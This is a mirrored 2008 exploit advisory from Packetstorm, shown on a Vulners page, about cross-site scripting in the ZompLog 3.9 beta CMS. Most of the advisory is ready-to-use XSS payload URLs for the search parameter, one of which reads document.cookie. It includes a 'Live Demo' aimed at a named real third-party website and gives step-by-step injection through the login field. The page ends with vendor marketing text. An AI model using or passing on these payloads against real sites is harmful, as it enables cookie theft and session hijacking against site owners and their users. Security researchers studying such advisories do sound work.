Lucene search
K

zomplog39-xss.txt

🗓️ 13 Oct 2008 00:00:00Reported by swappie aka faithloveType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

ZompLog 3.9 beta security vulnerabilities and XSS exploi

Code
`#############################################################################   
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 -C1c4Tr1Z - Gabitzu #  
# and all darkc0de members #   
;############################################################################   
#   
# Author: swappie [aka] faithlove   
  
# Email : [email protected]  
#   
# Do researching and share!   
#   
;###############################################################   
#   
# Title: ZompLog 3.9 beta  
#  
# CMS Link: http://www.zomp.nl/user-content/downloads/zomplog/zomplog3.9-beta.zip  
#  
# Vendor: http://www.zomp.nl/  
#   
#  
;############################################################################  
# #  
# Dork: I'm sure you can figure this out alone, right? #  
# #   
#############################################################################  
  
  
http://www.site.com/index.php?search=>"><script>alert(1234567890)</script>  
  
http://www.site.com/index.php?search=%00'"><script>alert(1234567890)</script>  
  
http://www.site.com/index.php?search=>"><script>alert(document.cookie)</script>  
  
  
Live Demo:  
  
http://www.irishesseling.nl/index.php?search=>"><script>alert(1234567890)</script>  
  
  
-----------------------------------------------------------------;  
  
  
*) Another Vulnerability regards the www.site.com/login.php  
  
Method 1.  
===========  
  
  
We can edit the html source code generated by the login.php and  
edit the following line:  
  
<td colspan="2"><input type="text" name="login" value="" maxlength="15" id="log" /></td>  
  
  
  
[===] MAKE IT LOOK LIKE THIS:  
  
<td colspan="2"><input type="text" name="login" value=">"><script>alert("XSS Vuln")</script>" maxlength="15" id="log" /></td>  
  
  
  
  
Method 2.  
===========  
  
Step 1.  
  
Write in Login section: >">  
  
Step 2.  
  
(Hit Enter) or click the Login Button.  
  
you'll see in Login something looking like this: >\  
  
Step 3.  
  
Delete the ">\" part and insert the following code in it: <script>alert("XSS Vuln")</script>  
  
Step 4.  
  
(Hit Enter) or click the Login Button.  
  
Result: You should see a small window with the "XSS Vuln" text in it.  
  
[!!!] This "login.php part" worked just with a fresh install of the CMS as i have  
installed it locally.  
  
  
Cheers,  
swappie [aka] faithlove`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19